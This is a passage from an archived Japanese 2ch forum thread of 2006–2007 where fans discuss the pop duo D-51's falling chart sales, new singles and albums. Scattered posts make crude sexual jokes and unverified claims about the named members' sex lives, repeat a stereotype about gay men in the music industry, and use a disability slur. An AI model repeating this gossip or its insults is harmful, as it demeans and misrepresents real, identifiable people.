するアレンジに萎え。デゴの個性がまた見えにくくなったな。
「二人の絶妙なハーモニーが…」みたいな紹介のされ方してたけど
こんなんハーモニーと言えないよ。

ただキーが下がってカラオケで歌いやすくなったのと、ライブで
盛り上がりそうなのは○だな。

143 :名無しさん@お腹いっぱい。:2006/12/08(金) 21:17:16 ID:WaubnHxf0
まあ何はともあれ、YASUが脱ぐなり太るなりしないと
間違いなくこのまま消えるか解散だな(汗)
このスレを見れば一目瞭然(笑)

144 :名無しさん@お腹いっぱい。:2006/12/08(金) 21:24:28 ID:4gpu5t1qO
「はじまる」88位 1185枚

何この落ち目っぷりは…。
うん、まぁ…次に期待するよ。

>>138
やっぱりあの曲がいいよね。
あれ聴いてファンになったもん。

145 :名無しさん@お腹いっぱい。:2006/12/09(土) 20:27:34 ID:llQWFsRK0
こんなにCMとかで一応プッシュされてんのに・・

146 :名無しさん@お腹いっぱい。:2006/12/09(土) 22:17:13 ID:J0qVa4wL0
50位くらいだと予想していたが、まさかそれより低いとは・・・('A`)
とはいえYUもイケメンに戻ったことだし、これからがはじまりだよはじまり。

147 :名無しさん@お腹いっぱい。:2006/12/10(日) 02:17:50 ID:oQ9vi2Pv0
>>44の予言は結果的に当たった事になるのか・・・?

148 :名無しさん@お腹いっぱい。:2006/12/10(日) 03:03:24 ID:4ktAIClyO
でもその1000人の中身が半端無いからな
安部総理を筆頭に、日本のトップがほとんど
庶民には縁が無い高級一流音楽なんだよ、D-51様は

149 :名無しさん@お腹いっぱい。:2006/12/10(日) 19:36:05 ID:segs61bhO
売れてない時にそんなこと言っても痛いだけだよ…。

150 :名無しさん@お腹いっぱい。:2006/12/10(日) 21:23:56 ID:mpvVNdBw0
はじまらずに終わったな

151 :名無しさん@お腹いっぱい。:2006/12/11(月) 14:16:30 ID:86BZ7pkGO
D-151

152 :名無しさん@お腹いっぱい。:2006/12/11(月) 18:16:02 ID:Cd77wy/W0
今までの特徴から言って「元気元気」路線は一発屋の特徴だな。やっぱし
そういうのは日本の風潮に合わないよ。購買層を10代20代としてるから
曲調もブライトな感じになるんだろうけど、名もないとこからどかっと
出てきたMinmiとか中村中見ても分かるように今の10代20代は
もっとコアでディープな音楽を求めてる。ポケットに5千曲入れる時代なんだから
相当の個性を発揮しないと、タイアップっていう一時しのぎじゃあ生き残れないよ。
そういう意味では88位は妥当と言えるね。

153 :名無しさん@お腹いっぱい。:2006/12/11(月) 23:16:23 ID:3YgIzD4HO
今のD-51の曲は初期のR&B色がまったくない、ただの無個性な歌謡曲だもんなー。
メジャー初期でファンになった人は離れて当然。
今と違って全然知名度がなく、しかもノンタイアップ曲だった「Dreamin' on」が、
知名度がある今の状態でタイアップ付きの「はじまる」より遥かに売れた理由をスタッフは少し考えて欲しい。

154 :名無しさん@お腹いっぱい。:2006/12/12(火) 22:55:07 ID:40YEfiNn0
おお!D-51ヲタにもまともに文章書ける奴がいるんだなw

155 :名無しさん@お腹いっぱい。:2006/12/13(水) 00:47:58 ID:+rIZdDyN0
つーかメジャー曲よりクオリティ落ちてる凡曲ジャンDreamin' on

156 :名無しさん@お腹いっぱい。:2006/12/13(水) 23:45:59 ID:lgOfSwGz0
YASUは地上に舞い降りた天使だな
天使の格好をしてほしい
もちろんフルチン

157 :名無しさん@お腹いっぱい。:2006/12/14(木) 16:50:38 ID:zeI8tHgZO
>>155その曲、メロとアレンジが凄く好きで
今聴いてる
この二人の良いところって
個性が相対的なところだね


158 :名無しさん@お腹いっぱい。:2006/12/14(木) 20:05:02 ID:vsfzB4nD0
YUが画像をうpしてるが、あれは間違いなく彼女の部屋で撮ったものだな。

159 :名無しさん@お腹いっぱい。:2006/12/15(金) 00:37:00 ID:WE71aaCR0
彼氏の部屋の間違いだろwww
それよかwikipediaで調べてみたけどYASUのうちは沖縄でも有名な歌手一家らしいぞ。
両親も兄も歌手なんだって。やっぱしあの12オクターブは持って生まれたものだったんだ。
どーでもいいけどデゴの二人やっと髪切ったな(笑)

160 :名無しさん@お腹いっぱい。:2006/12/15(金) 20:40:46 ID:ki1WPcpV0
まだあったのかこのスレ

161 :名無しさん@お腹いっぱい。:2006/12/16(土) 01:11:53 ID:aqnTZVcJO
D-51は永遠です

162 :名無しさん@お腹いっぱい。:2006/12/17(日) 21:16:43 ID:y2Uh515T0
YUの彼氏ってYASUだろ

163 :名無しさん@お腹いっぱい。:2006/12/17(日) 21:22:33 ID:0TXMrZ0nO
この前の音楽戦士に出てたのに反響無しかよw
D-51様大人気だな

164 :名無しさん@お腹いっぱい。:2006/12/18(月) 02:25:22 ID:fi6mZ6az0
YASUはヤリチソポだからYUの彼氏はYASUじゃないと思われ。
つうか音楽業界は特にゲイが牛耳っている部分が大きいんだから
ゲイに好かれる素質を持ったYASUがゲイ離れしたのはもったいないと思うけど
本人が、売れるより美人とヤル事にプライオリティ高く位置づけてるなら
それはそれでしょうがないのかも。今後はケミの川畑あたりを目指して
巻き返しを図って欲しい(笑)結局ケミの後追いか…

165 :名無しさん@お腹いっぱい。:2006/12/18(月) 20:00:04 ID:S8QyCR9C0
池沼顔の不細工が何勘違いしてるの?w
痩せたからって不細工が直るわけでもないのにww

166 :名無しさん@お腹いっぱい。:2006/12/18(月) 20:37:51 ID:1FxiiLa+O
>>165の視力は0.01

167 :名無しさん@お腹いっぱい。:2006/12/19(火) 09:56:37 ID:O4d0tJf20
1stアルバムしか持ってないんだけど、
2ndアルバムってどんな感じ?
曲の雰囲気は大体1stと同じ感じですかね?

168 :名無しさん@お腹いっぱい。:2006/12/19(火) 17:28:08 ID:R2IsJz/FO
>>167 なんて言ったらいいか分かんないけど1stより歌詞とか曲が素朴。っていうか遊んでる感じ。

169 :名無しさん@お腹いっぱい。:2006/12/19(火) 22:10:46 ID:hkxCVsWT0
1stよりさらにクオリティ低いのは間違いない

170 :名無しさん@お腹いっぱい。:2006/12/22(金) 21:16:12 ID:ER7Z7bMR0
年末のどの音楽番組にもD-51出ない・・・
もう終わっちまったのかな

171 :名無しさん@お腹いっぱい。:2006/12/24(日) 03:00:27 ID:g6T7XEdy0
今夏のヒットシングル「Brand New World」に続く
D-51のニューシングル。今作は「恋の始まり、わき上がる思い」を
直球で描き出したダンス・チューン。新進気鋭の作曲家、アレンジャーの
原田卓也を新たに迎え、グルヴィーかつキャッチーなD-51ミュージックの
新境地を感じさせてくれる1曲に仕上がっています。

172 :名無しさん@お腹いっぱい。:2006/12/24(日) 03:04:55 ID:g6T7XEdy0
落ち目歌手の定番、物まね番組の「ご本人登場」とかに
そろそろ出てきそうだな。ってかこいつらの物まねするやついるのか?
個性が無いからデフォルメのしようがないしwwwww

173 :名無しさん@お腹いっぱい。:2006/12/24(日) 21:44:19 ID:YH0G8KSN0
88位はいくらなんでも酷すぎる・・・。

どうやら、YASUがチンポ出すしか手はないみたいだな。

174 :名無しさん@お腹いっぱい。:2006/12/25(月) 00:35:20 ID:G3glNBC90
そうだな。どうせ消えるんだから
チンポ出して消えても出さなくて消えても同じだからな。

175 :名無しさん@お腹いっぱい。:2006/12/31(日) 01:29:06 ID:/Zq31MMR0
本気でカソりすぎですよwwwwwwwww

176 :名無しさん@お腹いっぱい。:2007/01/01(月) 17:41:38 ID:+enXeJO90
チンポはさすがに放送禁止だろうから、

YASUのケツでもいいよ

ケツならレンジの奴とかも出してるし

177 :名無しさん@お腹いっぱい。:2007/01/02(火) 21:37:58 ID:mHr0PwN3O
↑デゴスレ新年一発目の書き込みがそれかよw

ところで「はじまる」のその後だけど、2周目以降は200位以下の圏外で0枚扱いだから、
最終的な累計枚数は1185枚となりました。合掌。

178 :名無しさん@お腹いっぱい。:2007/01/03(水) 17:35:11 ID:0bUhkKSY0
1185枚ってマジやばくね??
インディーズレベルじゃね??

179 :名無しさん@お腹いっぱい。:2007/01/03(水) 21:04:57 ID:NAvaquZz0
1185枚じゃPV製作費用のペイすらできてないだろ

180 :名無しさん@お腹いっぱい。:2007/01/04(木) 17:04:25 ID:3a4UncMOO
このままいくと2/7のnewシングル「Forever Friends(c/wラストシーン)」をリリースしたあとアルバム出して、
それ以降はしょぼいタイアップしかつかなくなり、徐々にフェードアウトする可能性が…。
話題曲ALWAYS収録&初回盤はALWAYS、NO MORE CRYのPV収録の2ndALだって1万も売れてないんだし、
会社がいつまでも売れなくなったアーティストを置いといてくれるわけがない気がする。

181 :名無しさん@お腹いっぱい。:2007/01/04(木) 18:01:12 ID:w6aFkewhO
この手のアーは長くないよな

182 :名無しさん@お腹いっぱい。:2007/01/04(木) 18:05:14 ID:I1IEt3XA0
YASUの路線変更しか道はない。

183 :名無しさん@お腹いっぱい。:2007/01/04(木) 18:12:29 ID:YWB/D7siO
アルバム1万も売れて無いのかよw
でも世界で売り出したら間違いなく5000万は越えるな

184 :名無しさん@お腹いっぱい。:2007/01/04(木) 19:32:22 ID:VVr4jyIn0
まあYASUは歌手辞めても、薬剤師かなんかになりたいとか言ってたし
YUはカフェを開きたいとかで、一度知名度が全国レベルになった事だけは
彼らの人生にいい影響を与えるんじゃないかな。曲出なくなるのは
寂しいけど。
NHKで女が全裸になったんだから、YASUは民放でしりぐらい出してもいいと思う。

185 :名無しさん@お腹いっぱい。:2007/01/04(木) 19:42:52 ID:VVr4jyIn0
Forever Friendsっていかにもこのまま消えていきそうなタイトルだなww
二曲しか入ってなさそうだし。
落ち目歌手の定番、「PVがレコーディング風景」にそろそろなりそうだな!

186 :名無しさん@お腹いっぱい。:2007/01/04(木) 19:49:38 ID:w6aFkewhO
ここで橋を持ってくるとはwww


187 :名無しさん@お腹いっぱい。:2007/01/04(木) 20:06:24 ID:nqhRArOU0
>>180
ポニーキャニオンは、一発当てた歌手はずっと面倒見てくれるらしいよ

188 :名無しさん@お腹いっぱい。:2007/01/10(水) 02:10:29 ID:sjgyNI7y0
本当かよ

189 :名無しさん@お腹いっぱい。:2007/01/10(水) 21:09:29 ID:EKrTy61F0
こいつとか一発当てたおかげで毎日遊んで暮らしてるぞ。
http://blog.goo.ne.jp/mitsunaga-ryota/

190 :名無しさん@お腹いっぱい。:2007/01/11(木) 00:38:11 ID:WHUrbo0P0
そうか。一発当てて実家暮らしとかだったら
印税で遊んで暮らせるかもシレーヌ!

191 :名無しさん@お腹いっぱい。:2007/01/13(土) 10:01:32 ID:qs0eX6iUO
また売れるには、まず、D-51の二人に作詞と作曲をやめさせて、プロに任せることだな。
二人の詞と曲は、なんか遊び過ぎ。
最初はいいかもしれないけど、もう飽きた。

192 :名無しさん@お腹いっぱい。:2007/01/13(土) 18:40:53 ID:DG9E1QI80
何で一行空けて書くの?

193 :名無しさん@お腹いっぱい。:2007/01/14(日) 09:29:04 ID:uxl9v0bYO
新曲どうよ

194 :名無しさん@お腹いっぱい。:2007/01/14(日) 23:52:54 ID:/QK3Rviw0
もう詞や曲がどうこうして盛り返せるレベルではなくなってると思うが。
DJ OZMAみたいに事件起こすしかない。

195 :名無しさん@お腹いっぱい。:2007/01/15(月) 01:24:32 ID:0IvUgRHg0
次Mステ出る機会があったらそれが最後だと思って
ちんぽ付きのボディスーツ着て歌うしかない。

196 :名無しさん@お腹いっぱい。:2007/01/15(月) 01:26:42 ID:0IvUgRHg0
また春前にアルバム出すのかな
出したら出したで今年は冗談抜きに消滅するかもな

197 :名無しさん@お腹いっぱい。:2007/01/15(月) 01:30:51 ID:0IvUgRHg0
YASUはマライアキャリーと張れるぐらい歌唱力あるんだから
ソロになればいいのに。YUは渋谷歩いてるそこらの一般人より
下手な可能性もwww

198 :名無しさん@お腹いっぱい。:2007/01/15(月) 21:25:19 ID:IwKnL4q80
YASUが脱げばそれで大丈夫

199 :名無しさん@お腹いっぱい。:2007/01/16(火) 12:25:16 ID:EKyeHnFXO
マライアと張れる歌唱力あるの?
そんなにすごい上手いとまでは思わないけど…。
サヴァイバーで声高けーとは思ったけどさ。
ユウ君もそこそこ上手いと思うよ。

200 :名無しさん@お腹いっぱい。:2007/01/16(火) 12:57:36 ID:A8JY0v910
YASUは日本が唯一世界に誇れる歌手だからな。
YUとは雲泥の差。

201 :名無しさん@お腹いっぱい。:2007/01/17(水) 04:17:54 ID:ZtJ2WiR+0
YASUは脱ぐためにボディを筋トレしたんだよな?

202 :名無しさん@お腹いっぱい。:2007/01/19(金) 20:57:04 ID:gkrG+T9hO
D-51ってホント歌上手いよね。すごい綺麗。
TOP OF〜で好きになった。TOP〜とハイビスカスがすごい好き。
もっと売れて欲しいなぁ。勿体ないよあんなに上手いのに…。

203 :名無しさん@お腹いっぱい。:2007/01/20(土) 15:59:43 ID:eUrg3Fw/0
マピオヤジのスレwwwwwwwwwwwwwwwwww

204 :名無しさん@お腹いっぱい。:2007/01/27(土) 03:09:36 ID:ouwoaNTk0
明日、沖縄でのbjリーグのオールスターで歌うみたいだね。
BSフジで生中継やるみたいだから、見れる人はハーフタイムショーとして
D-51のライブが見れるかもね。

http://www.okinawa-basketball.jp/2007/01/post_42.html
http://www.bsfuji.tv/top/pub/bj_ana.html

http://www.basketballjapantv.com/
ここではネット放送で見れるけど、200円?だか払わないと見れないみたい。


http://www.bj-allstar.com/
http://bjleague.livedoor.biz/archives/50947962.html

205 :名無しさん@お腹いっぱい。:2007/01/27(土) 19:36:32 ID:U4MM2FJr0
記念パピコ
id参照

206 :名無しさん@お腹いっぱい。:2007/01/30(火) 21:50:32 ID:AvHkvUKY0
で、200円払ってみた奴いたのか?
どうせお決まりのノーモークライ歌ったんだろうなwwwww

207 :名無しさん@お腹いっぱい。:2007/02/05(月) 18:20:31 ID:ghAgo4co0


208 :名無しさん@お腹いっぱい。:2007/02/07(水) 02:02:07 ID:v1mBtgIP0
三横一村は買いですか否ですか??
ある意味最後のアルバムかも??

209 :名無しさん@お腹いっぱい。:2007/02/07(水) 02:08:34 ID:v1mBtgIP0
↑すげーーーーーー!!↑
何も考えないで投稿したら「2」と「7」が揃ってるーーーーーー!!!

210 :名無しさん@お腹いっぱい。:2007/02/07(水) 11:36:51 ID:9B2vY7dY0
デパペペの出っ歯の方にディーゴジュウイチって呼ばれてたよwwww

211 :名無しさん@お腹いっぱい。:2007/02/07(水) 18:33:30 ID:v1mBtgIP0
知ってますか?今日は新曲の発売日なんですよ。
なのにこの過疎りよう…。デゴイチオワータ(ノД`)

212 :名無しさん@お腹いっぱい。:2007/02/07(水) 19:08:28 ID:JWtIXTEj0
初登場30位圏外おめ!

213 :ツマ ◆BUKI.aHIhs :2007/02/07(水) 20:11:17 ID:2Krsw9JT0
前の曲といい今回の曲といい駄曲は売れなくて当然。

それにD-51は厨房向けアーティストなんだから
野茂暗いやBRAND NEW WORLDみたいな曲じゃないと売れない。

214 :名無しさん@お腹いっぱい。:2007/02/07(水) 21:08:45 ID:NNaWjO2HO
むしろ駄曲じゃん

215 :名無しさん@お腹いっぱい。:2007/02/08(木) 00:57:08 ID:9F2x5iwj0
今回の新曲は何つーかどこかで聞いたことある曲っていうかパクリって言うか…。
若さの割に斬新さがないよね。相も変わらずカラオケで歌いずらそうだし(笑)

216 :名無しさん@お腹いっぱい。:2007/02/08(木) 16:00:34 ID:ny0Q+fHu0
オフィシャルブログにYUの裸!!!!!!!!

217 :名無しさん@お腹いっぱい。:2007/02/08(木) 17:23:04 ID:XmN7hwtt0
YUの裸はいらね

218 :名無しさん@お腹いっぱい。:2007/02/08(木) 21:22:30 ID:93naey0cO
おまえらアホかと。
この曲はkiichi作曲だぞ。

219 :名無しさん@お腹いっぱい。:2007/02/08(木) 22:57:53 ID:9F2x5iwj0
中井貴一が作ったの??

220 :名無しさん@お腹いっぱい。:2007/02/09(金) 01:05:23 ID:7vt1/MY0O
横山?

221 :名無しさん@お腹いっぱい。:2007/02/09(金) 14:05:28 ID:xd/jGKeZ0
Vlidgeのkiichi

222 :名無しさん@お腹いっぱい。:2007/02/09(金) 18:00:14 ID:7vt1/MY0O
わかってるわ


223 :名無しさん@お腹いっぱい。:2007/02/12(月) 13:24:01 ID:3zDu3n/cO
新曲買ったよ。
久々にレベルの高い曲だと思う。今までシングルではDreamin'onが一番好きだったけど、この曲も負けず劣らずすごく好きだなぁ。
ラストシーンもテーマは同じく卒業だけどこれもc/wにするには勿体無い出来。もしこっちがシングルだったとしても絶対買ったよ。
ラストシーンのYU君の歌声が好きだな。一生懸命声を張り上げて歌ってる感じが、卒業シーズン独特の切なさみたいなのが現れてる気がした。

224 :名無しさん@お腹いっぱい。:2007/02/12(月) 17:14:11 ID:97MEKrC+O
でも現状ではいい歌ほど売れないよね


225 :名無しさん@お腹いっぱい。:2007/02/12(月) 21:47:20 ID:nkxXcA1M0
そうすね。倖田來未なんかを見ても分かるように、曲よりはプロモーションにかけたお金と、歌い手の容姿で
売れ行きが大きく変わってきますね。まあ最近ではコンテンツの多様化で音楽を娯楽と捉える日本人が
減ったっていうのもありますが。

226 :名無しさん@お腹いっぱい。:2007/02/16(金) 18:07:21 ID:PY+syE81O
Forever Friendsの売上が出たよ

67位 1697枚

…まぁ、はじまるよりも売れてくれて嬉しいよ。
Forever Friendsもラストシーンもほっこり温かくて切ない、名曲だもんね。

227 :名無しさん@お腹いっぱい。:2007/02/19(月) 00:24:03 ID:LVeb940yO
みんなアルバム買う?

228 :名無しさん@お腹いっぱい。:2007/02/19(月) 15:09:14 ID:wvs9NMmL0
初回盤のブックレットには二人の裸あるぞ

229 :名無しさん@お腹いっぱい。:2007/02/19(月) 20:48:27 ID:myb5bGemO
もちろん買うよ。ラストシーンの卒業MIXが楽しみ!
でも今回はアルバム9曲+ボーナストラック2曲だからなんだかなぁ。
しかもカップリング曲を2曲も入れてるからアルバム曲も少ないしガッカリだ。

230 :名無しさん@お腹いっぱい。:2007/02/19(月) 21:04:07 ID:c4s/g3j9O
変な書き込みが多すぎです。

231 :名無しさん@お腹いっぱい。:2007/02/19(月) 21:20:30 ID:EjO38PO60
レソタルで十分

232 :名無しさん@お腹いっぱい。:2007/02/19(月) 23:54:24 ID:hCT5luiAO
ガチムチの方の名前がYASU?今さら1stアルバム買ったよw いいね

233 :名無しさん@お腹いっぱい。:2007/02/20(火) 01:58:39 ID:f60fNBcLO
どこらへんがガチムチなのか分からん。
けど、それでもD-51のCDを買ってくれるキッカケになるのなら嬉しい事だね。

>232
気に入ってくれたのなら次は3rdアルバムもよろしく。
ボーナストラックでアコースティックLIVE音源が2曲入ってるから、臨場感溢れる2人の歌声をきっと堪能できるよ!

234 :名無しさん@お腹いっぱい。:2007/02/23(金) 17:07:22 ID:ypvjQrkf0
 

45 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)